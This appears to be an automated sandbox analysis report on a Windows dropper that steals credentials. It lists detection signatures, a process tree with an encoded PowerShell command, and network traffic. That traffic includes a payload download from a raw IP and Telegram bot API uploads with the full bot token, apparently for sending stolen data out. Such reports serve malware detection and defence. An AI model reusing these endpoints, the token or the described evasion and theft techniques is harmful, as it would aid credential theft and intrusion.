Create Interactive Tour

Windows Analysis Report
SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe

Overview

General Information

Sample Name:SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe
Analysis ID:722938
MD5:a93394c0d7a32e0ae2ba43a6fd881301
SHA1:b7c51ec181c8751f752e14dba96132a83eeaa7a8
SHA256:cb05606b742226130a4e421b47b04bee21b4da79bb883c15a3c6a9002d8dfa7d
Tags:exe
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
Tries to steal Mail credentials (via file / registry access)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Yara detected Costura Assembly Loader
Encrypted powershell cmdline option found
Uses the Telegram API (likely for C&C communication)
Machine Learning detection for sample
.NET source code contains potential unpacker
Machine Learning detection for dropped file
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
JA3 SSL client fingerprint seen in connection with other malware
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Abnormal high CPU Usage
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Queries information about the installed CPU (vendor, model number etc)
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
Drops PE files
Tries to load missing DLLs
Binary contains a suspicious time stamp
Creates a process in suspended mode (likely to inject code)

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious
  • System is w10x64
  • SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe (PID: 5792 cmdline: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe MD5: A93394C0D7A32E0AE2BA43A6FD881301)
    • powershell.exe (PID: 4892 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAANQA2AA== MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 4024 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • RegAsm.exe (PID: 1012 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe MD5: 6FD7592411112729BF6B1F2F6C34899F)
    • RegAsm.exe (PID: 5800 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe MD5: 6FD7592411112729BF6B1F2F6C34899F)
    • RegAsm.exe (PID: 3092 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe MD5: 6FD7592411112729BF6B1F2F6C34899F)
  • Fdmru.exe (PID: 4972 cmdline: "C:\Users\user\AppData\Roaming\Ccxsx\Fdmru.exe" MD5: A93394C0D7A32E0AE2BA43A6FD881301)
  • Fdmru.exe (PID: 5500 cmdline: "C:\Users\user\AppData\Roaming\Ccxsx\Fdmru.exe" MD5: A93394C0D7A32E0AE2BA43A6FD881301)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
00000000.00000002.666417537.000000000B141000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
    00000000.00000002.571519401.0000000007C95000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
      00000000.00000003.291180894.00000000092C1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
        00000010.00000000.495309818.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
          00000000.00000002.581149439.0000000007E04000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
            Click to see the 8 entries
            SourceRuleDescriptionAuthorStrings
            16.0.RegAsm.exe.400000.0.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
              0.2.SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe.7cdfeec.3.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
                0.2.SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe.aec1038.6.raw.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
                  0.2.SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe.aec1038.6.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
                    No Sigma rule has matched
                    Timestamp:41.216.183.235192.168.2.380496992012252 10/14/22-00:42:30.686053
                    SID:2012252
                    Source Port:80
                    Destination Port:49699
                    Protocol:TCP
                    Classtype:Executable code was detected
                    Timestamp:41.216.183.235192.168.2.380496992017962 10/14/22-00:42:30.034188
                    SID:2017962
                    Source Port:80
                    Destination Port:49699
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.341.216.183.23549699802034631 10/14/22-00:42:29.991059
                    SID:2034631
                    Source Port:49699
                    Destination Port:80
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:41.216.183.235192.168.2.380497002022640 10/14/22-00:44:33.586734
                    SID:2022640
                    Source Port:80
                    Destination Port:49700
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.341.216.183.23549700802034631 10/14/22-00:44:33.554000
                    SID:2034631
                    Source Port:49700
                    Destination Port:80
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.341.216.183.23549701802034631 10/14/22-00:44:48.157973
                    SID:2034631
                    Source Port:49701
                    Destination Port:80
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:41.216.183.235192.168.2.380497002012252 10/14/22-00:44:33.870351
                    SID:2012252
                    Source Port:80
                    Destination Port:49700
                    Protocol:TCP
                    Classtype:Executable code was detected
                    Timestamp:41.216.183.235192.168.2.380496992022640 10/14/22-00:42:30.034188
                    SID:2022640
                    Source Port:80
                    Destination Port:49699
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:41.216.183.235192.168.2.380497002017962 10/14/22-00:44:33.586734
                    SID:2017962
                    Source Port:80
                    Destination Port:49700
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:41.216.183.235192.168.2.380497012017962 10/14/22-00:44:48.194634
                    SID:2017962
                    Source Port:80
                    Destination Port:49701
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:41.216.183.235192.168.2.380497012022640 10/14/22-00:44:48.194634
                    SID:2022640
                    Source Port:80
                    Destination Port:49701
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:41.216.183.235192.168.2.380497012012252 10/14/22-00:44:48.589687
                    SID:2012252
                    Source Port:80
                    Destination Port:49701
                    Protocol:TCP
                    Classtype:Executable code was detected

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Source: SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeVirustotal: Detection: 22%Perma Link
                    Source: C:\Users\user\AppData\Roaming\Ccxsx\Fdmru.exeVirustotal: Detection: 22%Perma Link
                    Source: SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeJoe Sandbox ML: detected
                    Source: C:\Users\user\AppData\Roaming\Ccxsx\Fdmru.exeJoe Sandbox ML: detected
                    Source: 18.3.Fdmru.exe.764bf14.0.unpackAvira: Label: TR/Crypt.XPACK.Gen2
                    Source: SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.3:49702 version: TLS 1.2
                    Source: SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net40/Newtonsoft.Json.pdb source: SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe, 00000000.00000002.583918070.0000000007E94000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe, 00000000.00000002.609756812.0000000008F80000.00000004.08000000.00040000.00000000.sdmp
                    Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net45/Newtonsoft.Json.pdbSHA256 source: RegAsm.exe, 00000010.00000002.705382226.000000000478F000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.664683742.0000000004517000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net45/Newtonsoft.Json.pdb source: RegAsm.exe, 00000010.00000002.705382226.000000000478F000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.664683742.0000000004517000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net40/Newtonsoft.Json.pdbSHA256w^ source: SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe, 00000000.00000002.583918070.0000000007E94000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe, 00000000.00000002.609756812.0000000008F80000.00000004.08000000.00040000.00000000.sdmp
                    Source: Binary string: BouncyCastle.Crypto.pdb source: RegAsm.exe, 00000010.00000002.817676312.0000000005CD1000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: BouncyCastle.Crypto.pdbSHA256 source: RegAsm.exe, 00000010.00000002.817676312.0000000005CD1000.00000004.00000800.00020000.00000000.sdmp
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.785.24355.exeCode function: 4x nop then jmp 0120B874h
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov dword ptr [ebp-18h], 00000000h
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov dword ptr [ebp-18h], 00000000h
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov dword ptr [ebp-18h], 00000000h
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov dword ptr [ebp-18h], 00000000h
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov dword ptr [ebp-18h], 00000000h
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov dword ptr [ebp-18h], 00000000h
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov dword ptr [ebp-18h], 00000000h
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov dword ptr [ebp-20h], 00000000h
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp 05280AB3h
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp 05280AB3h
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov dword ptr [ebp-20h], 00000000h
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov dword ptr [ebp-18h], 00000000h
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov dword ptr [ebp-18h], 00000000h

                    Networking

                    barindex
                    Source: TrafficSnort IDS: 2034631 ET TROJAN Maldoc Activity (set) 192.168.2.3:49699 -> 41.216.183.235:80
                    Source: TrafficSnort IDS: 2022640 ET TROJAN PE EXE or DLL Windows file download Text M2 41.216.183.235:80 -> 192.168.2.3:49699
                    Source: TrafficSnort IDS: 2017962 ET TROJAN PE EXE or DLL Windows file download disguised as ASCII 41.216.183.235:80 -> 192.168.2.3:49699
                    Source: TrafficSnort IDS: 2012252 ET SHELLCODE Common 0a0a0a0a Heap Spray String 41.216.183.235:80 -> 192.168.2.3:49699
                    Source: TrafficSnort IDS: 2034631 ET TROJAN Maldoc Activity (set) 192.168.2.3:49700 -> 41.216.183.235:80
                    Source: TrafficSnort IDS: 2022640 ET TROJAN PE EXE or DLL Windows file download Text M2 41.216.183.235:80 -> 192.168.2.3:49700
                    Source: TrafficSnort IDS: 2017962 ET TROJAN PE EXE or DLL Windows file download disguised as ASCII 41.216.183.235:80 -> 192.168.2.3:49700
                    Source: TrafficSnort IDS: 2012252 ET SHELLCODE Common 0a0a0a0a Heap Spray String 41.216.183.235:80 -> 192.168.2.3:49700
                    Source: TrafficSnort IDS: 2034631 ET TROJAN Maldoc Activity (set) 192.168.2.3:49701 -> 41.216.183.235:80
                    Source: TrafficSnort IDS: 2022640 ET TROJAN PE EXE or DLL Windows file download Text M2 41.216.183.235:80 -> 192.168.2.3:49701
                    Source: TrafficSnort IDS: 2017962 ET TROJAN PE EXE or DLL Windows file download disguised as ASCII 41.216.183.235:80 -> 192.168.2.3:49701
                    Source: TrafficSnort IDS: 2012252 ET SHELLCODE Common 0a0a0a0a Heap Spray String 41.216.183.235:80 -> 192.168.2.3:49701
                    Source: unknownDNS query: name: api.telegram.org
                    Source: unknownDNS query: name: api.telegram.org
                    Source: unknownDNS query: name: api.telegram.org
                    Source: Joe Sandbox ViewASN Name: AS40676US AS40676US
                    Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                    Source: global trafficHTTP traffic detected: POST /bot5796425317:AAHM7r2yEwXDuHWfXY8KETRrxlUeHemQZEo/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary="e749d4e4-749a-41ce-b152-70d8d1eceec1"Host: api.telegram.orgContent-Length: 2227Expect: 100-continueConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /bot5796425317:AAHM7r2yEwXDuHWfXY8KETRrxlUeHemQZEo/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary="faf7003a-b216-46df-be53-6f8f76b435f5"Host: api.telegram.orgContent-Length: 13782Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /bot5796425317:AAHM7r2yEwXDuHWfXY8KETRrxlUeHemQZEo/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary="124a0fb1-8a78-4c1b-8ed5-2e41b547b56a"Host: api.telegram.orgContent-Length: 315Expect: 100-continue
                    Source: global trafficHTTP traffic detected: GET /Fppsmppzh.png HTTP/1.1Host: 41.216.183.235Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /Fppsmppzh.png HTTP/1.1Host: 41.216.183.235Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /Fppsmppzh.png HTTP/1.1Host: 41.216.183.235Connection: Keep-Alive
                    Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49702 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49702
                    Source: unknownTCP traffic detected without corresponding DNS query: 41.216.183.235
                    Source: unknownTCP traffic detected without corresponding DNS query: 41.216.183.235
                    Source: unknownTCP traffic detected without corresponding DNS query: 41.216.183.235
                    Source: unknownTCP traffic detected without corresponding DNS query: 41.216.183.235
                    Source: unknownTCP traffic detected without corresponding DNS query: 41.216.183.235
                    Source: unknownTCP traffic detected without corresponding DNS query: 41.216.183.235
                    Source: unknownTCP traffic detected without corresponding DNS query: 41.216.183.235
                    Source: unknownTCP traffic detected without corresponding DNS query: 41.216.183.235
                    Source: unknownTCP traffic detected without corresponding DNS query: 41.216.183.235
                    Source: unknownTCP traffic detected without corresponding DNS query: 41.216.183.235
                    Source: unknownTCP traffic detected without corresponding DNS query: 41.216.183.235
                    Source: unknownTCP traffic detected without corresponding DNS query: 41.216.183.235
                    Source: unknownTCP traffic detected without corresponding DNS query: 41.216.183.235
                    Source: unknownTCP traffic detected without corresponding DNS query: 41.216.183.235
                    Source: unknownTCP traffic detected without corresponding DNS query: 41.216.183.235
                    Source: unknownTCP traffic detected without corresponding DNS query: 41.216.183.235
                    Source: unknownTCP traffic detected without corresponding DNS query: 41.216.183.235
                    Source: unknownTCP traffic detected without corresponding DNS query: 41.216.183.235
                    Source: unknownTCP traffic detected without corresponding DNS query: 41.216.183.235
                    Source: unknownTCP traffic detected without corresponding DNS query: 41.216.183.235
                    Source: unknownTCP traffic detected without corresponding DNS query: 41.216.183.235
                    Source: unknownTCP traffic detected without corresponding DNS query: 41.216.183.235
                    Source: unknownTCP traffic detected without corresponding DNS query: 41.216.183.235
                    Source: unknownTCP traffic detected without corresponding DNS query: 41.216.183.235
                    Source: unknownTCP traffic detected without corresponding DNS query: 41.216.183.235
                    Source: unknownTCP traffic detected without corresponding DNS query: 41.216.183.235
                    Source: unknownTCP traffic detected without corresponding DNS query: 41.216.183.235
                    Source: unknownTCP traffic detected without corresponding DNS query: 41.216.183.235
                    Source: unknownTCP traffic detected without corresponding DNS query: 41.216.183.235
                    Source: unknownTCP traffic detected without corresponding DNS query: 41.216.183.235
                    Source: unknownTCP traffic detected without corresponding DNS query: 41.216.183.235
                    Source: unknownTCP traffic detected without corresponding DNS query: 41.216.183.235
                    Source: unknownTCP traffic detected without corresponding DNS query: 41.216.183.235
                    Source: unknownTCP traffic detected without corresponding DNS query: 41.216.183.235
                    Source: unknownTCP traffic detected without corresponding DNS query: 41.216.183.235
                    Source: unknownTCP traffic detected without corresponding DNS query: 41.216.183.235
                    Source: unknownTCP traffic detected without corresponding DNS query: 41.216.183.235
                    Source: unknownTCP traffic detected without corresponding DNS query: 41.216.183.235
                    Source: unknownTCP traffic detected without corresponding DNS query: 41.216.183.235
                    Source: unknownTCP traffic detected without corresponding DNS query: 41.216.183.235
                    Source: unknownTCP traffic detected without corresponding DNS query: 41.216.183.235
                    Source: unknownTCP traffic detected without corresponding DNS query: 41.216.183.235
                    Source: unknownTCP traffic detected without corresponding DNS query: 41.216.183.235
                    Source: unknownTCP traffic detected without corresponding DNS query: 41.216.183.235
                    Source: unknownTCP traffic detected without corresponding DNS query: 41.216.183.235
                    Source: unknownTCP traffic detected without corresponding DNS query: 41.216.183.235
                    Source: unknownTCP traffic detected without corresponding DNS query: 41.216.183.235
                    Source: unknownTCP traffic detected without corresponding DNS query: 41.216.183.235
                    Source: unknownTCP traffic detected without corresponding DNS query: 41.216.183.235
                    Source: unknownTCP traffic detected without corresponding DNS query: 41.216.183.235
                    Source: SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe, Fdmru.exe.0.drString found in binary or memory: http://41.216.183.235/Fppsmppzh.png
                    Source: RegAsm.exe, 00000010.00000002.627767607.0000000002E4C000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.638281280.0000000002ED0000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.640544728.0000000002F5F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.org
                    Source: SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe, 00000000.00000002.583918070.0000000007E94000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe, 00000000.00000002.609756812.0000000008F80000.00000004.08000000.00040000.00000000.sdmp, RegAsm.exe, 00000010.00000002.817676312.0000000005CD1000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.623586521.0000000002D8E000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.641487070.0000000002F78000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
                    Source: RegAsm.exe, 00000010.00000002.705382226.000000000478F000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.664683742.0000000004517000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertCSRSA4096RootG5.crt0E
                    Source: RegAsm.exe, 00000010.00000002.817676312.0000000005CD1000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.623586521.0000000002D8E000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.641487070.0000000002F78000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertEVCodeSigningCA-SHA2.crt0
                    Source: RegAsm.exe, 00000010.00000002.817676312.0000000005CD1000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.623586521.0000000002D8E000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.641487070.0000000002F78000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0
                    Source: SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe, 00000000.00000002.583918070.0000000007E94000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe, 00000000.00000002.609756812.0000000008F80000.00000004.08000000.00040000.00000000.sdmp, RegAsm.exe, 00000010.00000002.817676312.0000000005CD1000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.623586521.0000000002D8E000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.641487070.0000000002F78000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
                    Source: RegAsm.exe, 00000010.00000002.705382226.000000000478F000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.664683742.0000000004517000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                    Source: RegAsm.exe, 00000010.00000002.705382226.000000000478F000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.664683742.0000000004517000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                    Source: SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe, 00000000.00000002.583918070.0000000007E94000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe, 00000000.00000002.609756812.0000000008F80000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/NETFoundationProjectsCodeSigningCA.crt0
                    Source: RegAsm.exe, 00000010.00000002.705382226.000000000478F000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.664683742.0000000004517000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/NETFoundationProjectsCodeSigningCA2.crt0
                    Source: RegAsm.exe, 00000010.00000003.604596489.0000000005410000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                    Source: SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe, 00000000.00000002.583918070.0000000007E94000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe, 00000000.00000002.609756812.0000000008F80000.00000004.08000000.00040000.00000000.sdmp, RegAsm.exe, 00000010.00000002.817676312.0000000005CD1000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.623586521.0000000002D8E000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.641487070.0000000002F78000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
                    Source: RegAsm.exe, 00000010.00000002.705382226.000000000478F000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.664683742.0000000004517000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertCSRSA4096RootG5.crl0
                    Source: RegAsm.exe, 00000010.00000002.817676312.0000000005CD1000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.623586521.0000000002D8E000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.641487070.0000000002F78000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
                    Source: SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe, 00000000.00000002.583918070.0000000007E94000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe, 00000000.00000002.609756812.0000000008F80000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0=
                    Source: RegAsm.exe, 00000010.00000002.705382226.000000000478F000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.664683742.0000000004517000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                    Source: RegAsm.exe, 00000010.00000002.705382226.000000000478F000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.664683742.0000000004517000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                    Source: RegAsm.exe, 00000010.00000002.817676312.0000000005CD1000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.623586521.0000000002D8E000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.641487070.0000000002F78000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/EVCodeSigningSHA2-g1.crl07
                    Source: SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe, 00000000.00000002.583918070.0000000007E94000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe, 00000000.00000002.609756812.0000000008F80000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/NETFoundationProjectsCodeSigningCA.crl0E
                    Source: RegAsm.exe, 00000010.00000002.705382226.000000000478F000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.664683742.0000000004517000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/NETFoundationProjectsCodeSigningCA2.crl0F
                    Source: SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe, 00000000.00000002.583918070.0000000007E94000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe, 00000000.00000002.609756812.0000000008F80000.00000004.08000000.00040000.00000000.sdmp, RegAsm.exe, 00000010.00000002.817676312.0000000005CD1000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.623586521.0000000002D8E000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.641487070.0000000002F78000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
                    Source: SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe, 00000000.00000002.583918070.0000000007E94000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.785.24355.exe, 00000000.00000002.609756812.0000000008F80000.00000004.08000000.00040000.00000000.sdmp, RegAsm.exe, 00000010.00000002.817676312.0000000005CD1000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.623586521.0000000002D8E000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.641487070.0000000002F78000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
                    Source: RegAsm.exe, 00000010.00000002.817676312.0000000005CD1000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.623586521.0000000002D8E000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.641487070.0000000002F78000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
                    Source: RegAsm.exe, 00000010.00000002.817676312.0000000005CD1000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.623586521.0000000002D8E000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000010.00000002.641487070.0000000002F78000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/EVCodeSigningSHA2-g1.crl0K
